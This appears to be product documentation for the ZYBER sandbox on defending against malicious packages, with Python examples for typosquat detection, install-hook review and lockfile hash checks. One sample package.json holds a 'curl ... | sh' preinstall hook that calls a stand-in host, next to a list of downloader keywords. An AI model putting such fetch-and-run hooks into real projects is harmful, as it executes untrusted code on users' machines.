Dependency Safety

How ZYBER protects against malicious packages and supply chain attacks.

The Threat

Modern development relies on thousands of dependencies. Any one could be compromised:

Attack Vector           Real-World Examples
Typosquatting           colourama instead of colorama
Account hijacking       event-stream npm incident
Malicious updates       ua-parser-js compromised release
Dependency confusion    Private package name collision
Install scripts         Arbitrary code execution on npm install
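The typosquatting row is the one attack vector a developer can screen for before anything runs. The following is an added example, not part of the ZYBER documentation: it compares each requested package name against a constructed allowlist of well-known names (KNOWN_PACKAGES is sample data, not a registry feed) and flags names that are a couple of edits away from a known package but are not that package, which is exactly the colourama/colorama pattern.

```python
# Flag package names that look like near-misses of well-known packages.
# Added example; the allowlist below is constructed for illustration.
KNOWN_PACKAGES = {
    "colorama", "requests", "numpy", "lodash", "express", "urllib3",
}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: minimum single-character insertions,
    deletions and substitutions that turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + cost))  # substitution
        prev = cur
    return prev[-1]


def typosquat_candidate(name: str, known=KNOWN_PACKAGES, max_distance: int = 2):
    """Return (closest_known_name, distance) when `name` is not itself a
    known package but is within max_distance edits of one; otherwise None.
    Names are lower-cased because both npm and PyPI treat them case-insensitively."""
    name = name.lower()
    if name in known:
        return None
    best = None
    for candidate in known:
        d = edit_distance(name, candidate)
        if d <= max_distance and (best is None or d < best[1]):
            best = (candidate, d)
    return best


def review_install(names):
    """Map each suspicious name in a proposed install list to the known
    package it resembles; names that pass are simply absent from the result."""
    flagged = {}
    for n in names:
        hit = typosquat_candidate(n)
        if hit:
            flagged[n] = hit
    return flagged


if __name__ == "__main__":
    for pkg, (near, d) in review_install(["colourama", "requests", "lodahs"]).items():
        print(f"{pkg}: resembles {near} (edit distance {d}); review before installing")
```

A hit is a prompt to check the package page, author and download history, not proof of malice; legitimate forks and plugins often sit one edit away from the project they extend.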

Why ZYBER Helps

When you run npm install or pip install:

Traditional Setup             ZYBER
Runs on your machine          Runs in isolated VM
Access to your files          Access to workspace only
Access to your credentials    No access to your device
Persistent malware possible   Terminated with workspace
Network access to your LAN    No access to your network

Attack Containment

Install Script Execution

Package managers execute arbitrary code during installation:

In ZYBER, these scripts run inside the workspace:
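Isolation limits the damage, but it is still worth knowing which install-time scripts a package declares before running npm install. The following is an added example, not ZYBER's own tooling: it reads a package.json (the SAMPLE_PACKAGE_JSON below is constructed for illustration), lists the npm lifecycle hooks that run automatically at install time, and surfaces commands that fetch and pipe remote content into a shell so a reviewer can look at them first.

```python
import json

# npm lifecycle hooks that run automatically during a local `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed package.json for demonstration; not a real package.
SAMPLE_PACKAGE_JSON = """
{
  "name": "example-widget",
  "version": "1.0.0",
  "scripts": {
    "test": "node test.js",
    "postinstall": "node scripts/setup.js",
    "preinstall": "curl -s https://example.invalid/x | sh"
  }
}
"""

# Substrings that usually mean "downloads and executes something" or hides
# what it executes. Heuristic only; the goal is to surface scripts for review.
SUSPICIOUS_MARKERS = ("curl ", "wget ", "| sh", "| bash", "eval", "base64")


def install_scripts(package_json_text: str) -> dict:
    """Return the lifecycle scripts that would run at install time,
    as a mapping of hook name to command, in hook execution order."""
    data = json.loads(package_json_text)
    scripts = data.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def review_findings(package_json_text: str) -> list:
    """Describe each install-time script and which markers it triggered.
    An empty 'markers' list still means code runs at install; it is just
    less obviously a downloader."""
    findings = []
    for hook, cmd in install_scripts(package_json_text).items():
        markers = [m for m in SUSPICIOUS_MARKERS if m in cmd]
        findings.append({"hook": hook, "command": cmd, "markers": markers})
    return findings


if __name__ == "__main__":
    for f in review_findings(SAMPLE_PACKAGE_JSON):
        flag = "REVIEW" if f["markers"] else "runs at install"
        print(f"{f['hook']:>12}: {f['command']}  [{flag}]")
```

When a package declares hooks you have not reviewed, npm install --ignore-scripts installs it without running them, and for pip, --only-binary :all: avoids building source distributions (whose setup.py is the equivalent execution point); both are standard flags of those tools.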

Data Exfiltration Limits

Even if a malicious package runs, it can only exfiltrate:

Data                    Accessible
Workspace files         ✅ Yes (but not your real files)
API keys in workspace   ✅ Yes (use ephemeral sessions for sensitive keys)
Your local files        ❌ No
Your browser cookies    ❌ No
Your SSH keys (local)   ❌ No
Your password manager   ❌ No

Persistence Prevention

Malware persistence techniques don't work:

Technique                   Effectiveness
Cron jobs                   ❌ Workspace terminated
Systemd services            ❌ Workspace terminated
Shell profile modification  ❌ Ephemeral: gone on termination
Binary replacement          ❌ Workspace terminated
Kernel modules              ❌ No kernel access

Package Registry Security

Registry Connections

Registry                  Connection
npm (registry.npmjs.org)  HTTPS, verified
PyPI (pypi.org)           HTTPS, verified
crates.io                 HTTPS, verified
apt repositories          HTTPS, GPG verified

Checksum Verification

Package managers verify integrity:

ZYBER doesn't modify packages, so standard verification works normally.

Use Lockfiles

Always commit lockfiles to pin exact versions:

Package Manager   Lockfile
npm               package-lock.json
yarn              yarn.lock
pip               requirements.txt with hashes
cargo             Cargo.lock
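The two sections above (Checksum Verification and Use Lockfiles) rely on the same mechanism: the lockfile records a digest of every artifact, and the package manager refuses anything whose bytes do not match. The following added example, not part of the ZYBER documentation, shows that check in the two formats the table mentions: pip's --hash=sha256:<hex> pins in requirements.txt and npm's Subresource Integrity strings (sha512-<base64>) in package-lock.json. SAMPLE_ARTIFACT, SAMPLE_LOCK and SAMPLE_REQUIREMENT are constructed sample data; the digests embedded in them are those of the constructed artifact.

```python
import base64
import hashlib
import hmac
import json

# Constructed bytes standing in for a downloaded wheel or tarball.
SAMPLE_ARTIFACT = b"hello\n"


def make_sri(algo: str, data: bytes) -> str:
    """Build a Subresource Integrity string ('sha512-<base64 digest>') the
    way npm records it in package-lock.json 'integrity' fields."""
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


# Constructed package-lock.json (lockfileVersion 3 layout: a 'packages' map
# keyed by node_modules path). The integrity value is the sha256 SRI of
# SAMPLE_ARTIFACT; real npm lockfiles normally use sha512.
SAMPLE_LOCK = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "node_modules/example-widget": {
            "version": "1.0.0",
            "integrity": "sha256-WJG1tSLV3whtD/CxEPvZ0hu0/HFjrzTQgoai6Eb2vgM=",
        }
    },
})

# Constructed requirements.txt line in pip's hash-checking format.
SAMPLE_REQUIREMENT = (
    "example-widget==1.0.0 "
    "--hash=sha256:5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03"
)


def verify_pip_hash(requirement_line: str, data: bytes) -> bool:
    """Check artifact bytes against the --hash=<algo>:<hex> pins on one
    requirements.txt line. A line with no pins fails, mirroring what
    pip --require-hashes does with an unpinned requirement."""
    pins = [tok[len("--hash="):] for tok in requirement_line.split()
            if tok.startswith("--hash=")]
    if not pins:
        return False
    for pin in pins:
        algo, _, expected = pin.partition(":")
        actual = hashlib.new(algo, data).hexdigest()
        if hmac.compare_digest(actual, expected.lower()):
            return True
    return False


def verify_sri(integrity: str, data: bytes) -> bool:
    """Check artifact bytes against an SRI string. SRI allows several
    space-separated '<algo>-<base64>' entries; any one matching passes."""
    for entry in integrity.split():
        algo, _, b64 = entry.partition("-")
        try:
            actual = hashlib.new(algo, data).digest()
        except ValueError:          # unknown algorithm: cannot vouch for it
            continue
        if hmac.compare_digest(actual, base64.b64decode(b64)):
            return True
    return False


def verify_lock_entry(lockfile_text: str, package_path: str, data: bytes) -> bool:
    """Look a package up in an npm lockfile and verify its bytes against
    the recorded integrity value."""
    lock = json.loads(lockfile_text)
    entry = lock["packages"][package_path]
    return verify_sri(entry["integrity"], data)


if __name__ == "__main__":
    print("pip pin ok:", verify_pip_hash(SAMPLE_REQUIREMENT, SAMPLE_ARTIFACT))
    print("npm lock ok:", verify_lock_entry(SAMPLE_LOCK, "node_modules/example-widget", SAMPLE_ARTIFACT))
    print("tampered:", verify_lock_entry(SAMPLE_LOCK, "node_modules/example-widget", b"hello world\n"))
```

In practice you let the tools do this: pip install --require-hashes -r requirements.txt, npm ci (which installs from package-lock.json and fails on mismatch), and cargo build --locked all refuse artifacts that do not match the committed lockfile. The point of committing the lockfile is that a compromised release cannot silently replace a pinned version.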

Audit Before Install

Use Ephemeral Sessions for Untrusted Code

When evaluating unknown packages:

  1. Create ephemeral workspace

  2. Install and test package

  3. Terminate workspace

If the package turns out to be malicious, nothing persists beyond the workspace.

Minimal Permissions in Workspace

Even within workspace:

AI Agent Safety

When AI agents suggest installing packages:

Scenario                        Protection
AI suggests malicious package   Runs in workspace, not your device
AI runs curl | bash             Executes in workspace only
AI modifies system files        Workspace system, not yours
AI installs rootkit             Terminated with workspace

This is why ZYBER exists: AI agents can experiment freely without risking your actual system.

Limitations

ZYBER protects your device, but cannot prevent:

Risk                                          Mitigation
Malicious code accessing workspace data       Use ephemeral sessions for sensitive work
Exfiltration of API keys stored in workspace  Rotate keys, use short-lived tokens
Cryptocurrency mining in workspace            Resource limits, billing visibility
Workspace being used for attacks              Network rate limiting, abuse detection
